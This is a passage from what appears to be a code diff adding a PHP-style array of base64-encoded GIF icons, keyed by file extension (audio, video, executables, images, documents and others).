+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
+"ext_au"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_avi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
+"ext_bat"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+"dmrYAMn1onq/YKpjvEgAADs=",
+"ext_bin"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ".
+"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ".
+"/aZBVOqkpUa/4KisRC6rEgA7",
+"ext_bmp"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_cat"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7".
+"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk".
+"fRQRADs=",
+"ext_cgi"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
+"RYtMAgEAOw==",
+"ext_cmd"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+"dmrYAMn1onq/YKpjvEgAADs=",
+"ext_cnf"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgAAA/wD//wAAAANK".
+"CLqs9weESSuAMZQSiPfBBUlVIJyo8EhbJ5TTRVJvM8gaR9TGRtyZSm1T+OFau87HGKQNnlBgA5Cq".
+"Yh4vWOz6ikZFoynjSi6byQkAOw==",
+"ext_com"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ".
+"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ".
+"/aZBVOqkpUa/4KisRC6rEgA7",
+"ext_cov"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAEUxDJKY+9Fr3ND/JV9lASAHCV9mHPybXay7kb4LUmILWziOiPwaB1IH5i".
+"uMVCaLGBRhOT0pQBri6mQEL3Q8py0ZwYTLE5b6Aw9lw+Y6glN2Ytt0QAADs=",
+"ext_cpc"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd".
+"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7",
+"ext_cpl"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ".
+"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ".
+"/aZBVOqkpUa/4KisRC6rEgA7",
+"ext_cpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
+"Eq7YrLDE7a4SADs=",
+"ext_crl"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd".
+"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7",
+"ext_crt"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd".
+"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7",
+"ext_css"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_diz"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
+"Ow==",
+"ext_doc"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
+"ext_dot"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///8DAwAAA/4CAgICAAP//AAAAAANW".
+"eHrV/gWsYqq9cQDNN3gCAARkSQ5m2K2A4AahF2wBJ8AwjWpz6N6x2ar2y+1am9uoFNQtB0WVybQk".
+"xVi2V0hBmHq3B8JvPCZIuAKxOp02L8KEuFwuSQAAOw==",
+"ext_dsp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAQALAAAAAAQABAAggAAAP///wAAgICAgAAAAAAAAAAAAAAAAAND".
+"SATc7gqISesE0WrxWPgg6InAYH6nxz3hNwKhdwYqvDqkq5MDbf+BiQ/22sWGtSCFRlMsjCRMpKEU".
+"Sp1OWOuKXXSkCQA7",
+"ext_dsw"=>
+"R0lGODlhEAAQABEAACH5BAEAAAMALAAAAAAQABAAgQAAAP///wAAgAAAAAIrnI+py+0CYxwgyUvr".
+"AaH7AIThBnJhKWrc16UaVcbVSLIglbipw/f+D0wUAAA7",
+"ext_eml"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEoALAAAAAAQABAAhgAAAHBwcP7//3l+qc3MzP3+/+ny/ZGexQ+L".
+"/1qh9C1kvVBQg////zVe+NaSdubx9zSq/wWV/4TF/xiV9oWp3EBu6Fy4/w2c/nGKtqvZ8QKX/05j".
+"kkZzxSyo//Dx8vz8/G17qfz9/q7h/wmQ/+31+lZzqnyWw1p5sRxJlkJsr+fy+D+X7wt76ou26ROD".
+"7AyN//P5/1yb5/r8/tHm8tvr9NPV11GN2E1VbzhVvDFW7WSG04NNL3yOwi5Q5BOg/2JjlgOV+/r6".
+"+mhuoWO6/0ZloBtNroag1qrd/7rt/yZ0/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAe1gEqCg0oJCSWEiYMJSCI2KIpKCIIJRy0KOBxEhBQUCBQJEisKB6Wl".
+"A4JGAggWHRMKH0EfIQUGAwFKJgwICA1FJAW0Dg4wt0oYDA0VPRw8Bc87Dra4yAweBNjYNTQz00og".
+"MgLiAgXKORUN3kIFAtfZEx0aQN4/4+IZFxcWEhHeGw8AVWSYEAGCBAv9jC1YEMOFDggvfAwBsUDD".
+"QlxKAgRQwCLJCAgbNJ7QiHHQxhQ3SkYSRHJlIAA7",
+"ext_exc"=>
+"R0lGODlhEAAQACIAACH5BAEAAAQALAAAAAAQABAAgv///4CAgAAAAMDAwAAAAAAAAAAAAAAAAAM6".
+"SBTcrnCBScEYIco7aMdRUHkTqIhcBzjZOb7tlnJTLL6Vbc3qCt242m/HE7qCRtmMokP6jkgba5pJ".
+"AAA7",
+"ext_exe"=>
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
+"xhIAOw==",
+"ext_fla"=>
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_fon"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAICAgMDAwAAA/wAAAAAAAAAAAANJ".
+"WLLc9VCASecQ8MlKB8ARRwVkEDabZWrf5XarYglEXQNDnNID0Q+50ETywwVZnwXApxJWmDgdx9ZE".
+"VoCeo0wEi2C/31hpTF4lAAA7",
+"ext_gif"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEYALAAAAAAQABAAhgAAAGZmZoWm2dfr/sjj/vn7/bfZ/bnK+Ofy".
+"/cXX/Jam05GYyf7LAKnT/QNoAnCq0k5wUJWd0HSDthZ2E0Om94my52N3xpXF+d3k6/7nkebs8zuh".
+"J9PY6HmHyXuSxXmb2YUeCnq68m10p3Z6w3GsUEisMWuJVlZswUGV5H1uo2W0knK1qZSkyqG644WZ".
+"yYWIs4uTtaux+MfL/uXn5/7tsZvD6q7F28pjIIp4hMhsFIglCqxWKLOLdP/VM/7bU9WNTeeCKOey".
+"LnZZhjhwR1x5Zx1oLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAevgAKCg4MBRoeIAhkFjI0CIYaIRgIMPjSNBRQUKJGHAj0MDEEFCAgJ".
+"CTELnYoMOUA/GggDAzIHqwU8OzcgQrMDCbaJBQY4OikjFgQEwKulBBUKEScWp8GesbIGHxE1RTbW".
+"Ri4zsrPPKxsO4B4YvsoGFyroQ4gd7APKBAbvDyUTEIcSONxzp6/BgQck/BkJiE+fgQYGWwQwQcSI".
+"CAUYFbBYwHEBjBcBQh4KSbIkSUSBAAA7",
+"ext_h"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
+"Wq/NknbbSgAAOw==",
+"ext_hpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
+"UqUagnbLdZa+YFcCADs=",
+"ext_ht"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAICAgMDAwP8AAP///wAA/wAAgAD//wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARMEEk0pr2VynxnHQEYjGM3nESqCsB2fkAss9gJHEVu0B4S".
+"EICcjqfxAYWFXevyAxieT+IkIKhaq0sLaUtiqr6qrPFKFgdkaHRnzW5PIgA7",
+"ext_hta"=>
+"R0lGODlhEAAQABEAACH5BAEAAAMALAAAAAAQABAAgf///wAAAACAAAAAAAI63IKpxgcPH2ouwgBC".
+"w1HIxHCQ4F3hSJKmwZXqWrmWxj7lKJ2dndcon9EBUq+gz3brVXAR2tICU0gXBQA7",
+"ext_htaccess"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+"AAA7",
+"ext_htm"=>
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+"ADs=",
+"ext_html"=>
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+"ADs=",
+"ext_img"=>
+"R0lGODlhEwAQALMAAAAAAP///6CgpHFzcVe2Osz/mbPmZkRmAPj4+Nra2szMzLKyspeXl4aGhlVV".
+"Vf///yH5BAEAAA8ALAAAAAATABAAAASA8KFJq00vozZ6Z4uSjGOTSV3DMFzTCGJ5boIQKsrqgoqp".
+"qbabYsFq+SSs1WLJFLgGx82OUWMuXVEPdGcLOmcehziVtEXFjoHiQGCnV99fR4EgFA6DBVQ3c3bq".
+"BIEBAXtRSwIsCwYGgwEJAywzOCGHOliRGjiam5M4RwlYoaJPGREAOw==",
+"ext_inf"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_ini"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_isp"=>
+"R0lGODlhEAAQADMAACH5BAEAAAwALAAAAAAQABAAgwAAAICAAP8A/wCAgAD/////AP///8DAwICA".
+"gIAAgACAAAD/AAAAAAAAAAAAAAAAAARakMl5xjghzC0HEcIAFBrHeALxiSQ3LIJhEIkwltOQxiEC".
+"YC6EKpUQBQCc1Oej8B05R4XqYMsgN4ECwGJ8mrJHgNU0yViv5DI6LTGvv1lSmBwwyM1eDmDP328i".
+"ADs=",
+"ext_ist"=>
+"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAzmQBmzAAAAABmmQCZzACZ/wAzzGaZzDOZ".
+"/5n//wBm/2bM/zPM/zOZzMz//zNmzJnM/zNmmQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAV1oASMZDlKqDisQRscQYIAKRAFw3scTSPPKMDh4cI9dqRgi0BY4gINoIhQ".
+"QBQUhSZOSBMxIIkEo5BlrrqAhWO9KLgIg5NokYCMiwGDHICwKt5NemhkeEV7ZE1MLQYtcUF/RQaS".
+"AGdKLox5I5Uil5iUZ2gmoichADs=",
+"ext_jfif"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_jpe"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_jpeg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_jpg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_js"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
+"a00AjYYBbc/o9HjNniUAADs=",
+"ext_lnk"=>
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
+"ADs=",
+"ext_log"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
+"ext_m1v"=>
+"R0lGODlhEAAQADMAACH5BAEAAAwALAAAAAAQABAAgwAAAICAgMDAwP///4AAAICAAACAAP//AP8A".
+"AAAA/wCAgAD//wAAAAAAAAAAAAAAAARlkEkZapiY2iDEzUwwjMmSjN8kCoAXKEmXhsLADUJSFDYW".
+"AKOa7bDzqG42UYFopHRqLMHOUDmungbDQTH74ToDQ0Fr8Ak5guy4QPCNWizCATFvq2xxBB1h91UJ".
+"BHx9IBOAg4SIDBEAOw==",
+"ext_m3u"=>
+"R0lGODlhEAAQAEQAACH5BAEAABUALAAAAAAQABAAhAAAAPLy8v+qAHNKAD4+Prl6ADIyMubm5v+4".
+"SLa2tm5ubsDAwJ6ennp6ev/Ga1AyAP+Pa/+qJWJiYoCAgHMlAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVzYCWOlQSQAEWORMCcABENa9UG7lNExUnegcQAIeitgIoC0fjDNQYCokBh".
+"8NmCUIdDKhi8roGGYMztugCARXgwcIzHg0TgYKikg9yCAkcfASZccXx1fhBjejhzhCIAhlNygytQ".
+"PXeKNQMPPml9NVaMBDUVIQA7",
+"ext_mdb"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAEV/BIRKuV+KDHO0eAFBRjSRbfE6JeFxwqIAcdQm4FzB0A+5AP2qvDo3FM".
+"P92DxzJtXpIlQHjr5KLMX2Dj2kmNrZ+XaSqPQ5NdBovWhD08DGJNb4Nk+LwsAgA7",
+"ext_mid"=>
+"R0lGODlhEAAQACIAACH5BAEAAAQALAAAAAAQABAAggAAAP///4CAgMDAwAAAAAAAAAAAAAAAAANE".
+"SCTcrnCFSecQUVY6AoYCBQDiCIDlyJ1KOJGqxWoBWa/oq8t5bAeDWci0Awprtpgx91IGmcjKs7XZ".
+"TBeDrHZ7NXm/pwQAOw==",
+"ext_midi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAQALAAAAAAQABAAggAAAP///4CAgMDAwAAAAAAAAAAAAAAAAANE".
